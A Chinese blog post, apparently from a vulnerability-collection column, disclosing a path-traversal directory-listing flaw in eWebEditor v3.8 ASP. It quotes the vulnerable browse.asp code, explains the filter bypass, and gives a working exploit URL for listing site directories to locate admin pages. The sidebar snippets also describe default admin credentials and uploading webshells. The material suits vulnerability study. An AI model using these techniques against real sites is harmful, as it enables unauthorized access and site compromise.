eWebEditor v3.8 ASP版列目录漏洞

最新推荐文章于 2023-10-18 14:57:35 发布
最新推荐文章于 2023-10-18 14:57:35 发布
阅读量892 收藏
点赞数
分类专栏: 漏洞收集 文章标签: eWebEditor

漏洞文件:asp/browse.asp
漏洞发生者:鬼哥
漏洞产生:

[php]
Sub InitParam()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))
sCusDir = Trim(Request.QueryString("cusdir"))

Dim i, aStyleConfig, bValidStyle
bValidStyle = False
For i = 1 To Ubound(aStyle)
aStyleConfig = Split(aStyle(i), “|||”)
If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
bValidStyle = True
Exit For
End If
Next

If bValidStyle = False Then
OutScript(“alert(‘Invalid Style.’)”)
End If

sBaseUrl = aStyleConfig(19)
nAllowBrowse = CLng(aStyleConfig(43))
nCusDirFlag = Clng(aStyleConfig(61))

If nAllowBrowse <> 1 Then
OutScript(“alert(‘Do not allow browse!’)”)
End If
If nCusDirFlag <> 1 Then
sCusDir = “”
Else
sCusDir = Replace(sCusDir, “\”, “/”)
If Left(sCusDir, 1) = “/” Or Left(sCusDir, 1) = “.” Or Right(sCusDir, 1) = “.” Or InStr(sCusDir, “./”) > 0 Or InStr(sCusDir, “/.”) > 0 Or InStr(sCusDir, “//”) > 0 Then
sCusDir = “”
Else
If Right(sCusDir, 1) <> “/” Then
sCusDir = sCusDir & “/”
End If
End If
End If

sUploadDir = aStyleConfig(3)
If Left(sUploadDir, 1) <> “/” Then
sUploadDir = “../” & sUploadDir
End If

Select Case sBaseUrl
Case “0″
sContentPath = aStyleConfig(23)
Case “1″
sContentPath = RelativePath2RootPath(sUploadDir)
Case “2″
sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
End Select

sUploadDir = sUploadDir & sCusDir
sContentPath = sContentPath & sCusDir

Select Case sType
Case “FILE”
sAllowExt = “”
Case “MEDIA”
sAllowExt = “rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov”
Case “FLASH”
sAllowExt = “swf”
Case Else
sAllowExt = “bmp|jpg|jpeg|png|gif”
End Select

sCurrDir = sUploadDir
sDir = Trim(Request(“dir”))
[/php]

'1.假设dir= ../
'2.假设dir=...//
'3.假设dir=.....///
        sDir = Replace(sDir, "\", "/")  '过滤1
        sDir = Replace(sDir, "../", "") '过滤2
'1.到这里就被过滤了
        sDir = Replace(sDir, "./", "") '过滤3
'2到这里也被功率了
'3到这里就成../了。比较有趣的饶过!好象不少cms这样过滤过。


[php]
If sDir <> "" Then
If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
sCurrDir = sUploadDir & sDir & "/"
Else
sDir = ""
End If
End If

End Sub
[/php]

漏洞测试EXP:http://www.xxx.net/asp/browses.asp?style=gray&dir=…..///…..//  饶过过滤直接列根目录(只能列图片已目录)可用于找后台等(利用exp在页面不会显示出目录来,得查看源文件).

7禧
关注
专栏目录
eWebEditor V12.0 for ASP 多语言商业版.rar
08-22
eWebEditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。...eWebEditor!...eWebEditor12.0中文商业版 (内置word导入等功能)
eWebEditor V10.8 for ASP 多语言商业版 修改弹出窗口提示
02-16
**eWebEditor V10.8 for ASP 多语言商业版**是一款强大的在线HTML编辑器,专为ASP(Active Server Pages)平台设计。它提供了一种简单易用的界面,使得非技术人员也能轻松编辑网页内容,支持多种语言,极大地提高了...
php版ewebeditor 3.8的漏洞
weixin_34384915的博客
09-22 133
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法: 1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必 须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:aler...
ewebeditor 3.8php漏洞,eWebEditor v3.8 目录漏洞asp版本】
weixin_30299099的博客
03-11 124
标题:asp eWebEditor v3.8 目录漏洞(其他版本为测试)漏洞文件:asp/browse.asp漏洞产生:Sub InitParam()sType = UCase(Trim(Request.QueryString("type")))sStyleName = Trim(Request.QueryString("style"))sCusDir = Trim(Request.QueryS...
ewebeditor 3.8 任意文件上传漏洞解析
ice
11-09 1207
   首先这个是别人早都发出来的一个漏洞,exp也写好了,如下 &lt;title&gt;eWebeditoR3.8 for php任意文件上EXP&lt;/title&gt; &lt;form action="" method=post enctype="multipart/form-data"&gt; &lt;INPUT TYPE="hidden" name="MAX_F
ewebeditor编辑器漏洞
arissa666的博客
10-18 686
网页在线编辑器,权限限制不严格,弱口令,文件过滤出现问题。
ewebeditor 3.8php漏洞,asp eWebEditor v3.8 目录漏洞
weixin_39599705的博客
03-11 189
好久没发洞了,今天搞个站遇到了asp eWebEditor v3.8随便挖掘了下,下面是成果,getshell的是没有,小洞还是发现了个!标题:asp eWebEditor v3.8 目录漏洞(其他版本为测试)漏洞文件:asp/browse.asp漏洞发生者:鬼哥漏洞产生:Sub InitParam()sType = UCase(Trim(Request.QueryString("type"...
[其他类别]eWebEditor For PHP v3.8_ewebeditorphp38.zip
03-18
v3.8版本中,eWebEditor进一步提升了用户体验和功能特性,使其成为众多网站后台编辑系统中的首选工具。 **一、eWebEditor的功能特性** 1. **所见即所得(WYSIWYG)编辑**:eWebEditor采用直观的用户界面,提供...
eWebEditor V10.0 for JSP 多语言商业版
07-15
**eWebEditor V10.0 for JSP 多语言商业版详解** eWebEditor是一款功能强大的在线HTML编辑器,特别为JSP(JavaServer Pages)平台设计,它提供了丰富的文本编辑功能,使得用户可以在网页上进行类似Word的富文本编辑...
其他类别eWebEditor For PHP v3.8-ewebeditorphp38.rar
最新发布
04-08
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。...【项目质量】:所有源码都经过严格测试,可以直接...
ewebeditor for php任意文件上传漏洞
weixin_34290000的博客
11-27 711
漏洞仅测试了最新版v3.8,不知道低版本是否存在此漏洞。PHP版本的ewebeditor并没有使用数据库来保存配置信息,所有信息位于php/config.php中,代码如下: <?php $sUsername = "admin"; $sPassword = "admin"; $aStyle[1] = "gray|||gray|||office|...
ewebeditor远程上传漏洞
weixin_34236497的博客
12-30 266
有人说通杀,有人说2.8以后…… 远程上传时执行代码 导致get shell 1.把yc.gif.asp xiaoma.ASa放在同一目录下(本地的) ——————————————远程文件(yc.gif.asp)—————————————————— <%Setfs=CreateObject("Scripting.FileSystemObject"...
ewebeditor 5.2 目录漏洞
weixin_34162695的博客
01-03 177
利用方法如下 http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/.. 由于st0p测试的时候,上传目录是根目录下的uploadfile,通过上面的地址就可以得到根目录下的所有目录了. 嘿嘿,如果你发现打开的时候显示的是空白,不要灰心,这就对了,直接查看源代码,看到了...
Ewebeditor 的一些漏洞总结
eldn__的专栏
06-23 1万+
于是像windows一样被黑客们挖掘出很多漏洞,大家莫急,笔者Minghacker总结前人基础,一一道来。  对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:  默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),  NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb  默认的后台路径是admi
ewebeditor漏洞利用总结
fengling132的专栏
03-16 1200
ewebeditor漏洞利用总结      先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下: 1、首先访问默认管理页看是否存在。         默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!) 2、默认管理帐号密码!
Ewebeditor最新漏洞漏洞大全
java开发指南博客 【转载】
04-02 426
Ewebeditor最新漏洞漏洞大全[收集] 来源:转载作者:佚名时间:2009-06-03 00:04:26 以下文章收集转载于网络:) 算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器, 所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。 漏洞更新日期TM: 2009 2 9日转...
ewebeditor漏洞大全
热门推荐
xysoul的专栏
03-23 1万+
1:默认管理后台: http://www.backlion.com/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard 拷贝一份(直接修改改不了) 在拷贝的一份里加入图片类型( asa aaspsp )   然后点预览 在编辑器里点设计    然后直接上传asa大马. 上传后 在代码里可以看到马的位置!
ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
weixin_34195142的博客
03-15 809
这个编辑器按脚本分主要有4个版本,ASP/ASPX/PHP/JSP 每个版本都有可以利用的漏洞。判断网站是否使用了eWebEditor查看程序源代码,看看源码中是否存在类似”ewebeditor.asp?id=”语句,只要有此语句的存在,就能判断网站确实使用了WEB编辑器。另外一种方法就是站上新闻或者其他板块上找图片、附件等的链接,是否为admin/eWebEditor/UploadFile/xx...
ewebeditor漏洞目录遍历漏洞
weixin_33790053的博客
01-03 604
这里大概说一下!目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp 高版本的是ewebeditor/admin/upload.asp 文件!这个文件有的不需要登陆验证,有些需要!很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改!这种情况下,唯一可以利用的也就是利用遍历 目录功能查看网站文件,比如数据库路径、后台地址、其他的上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值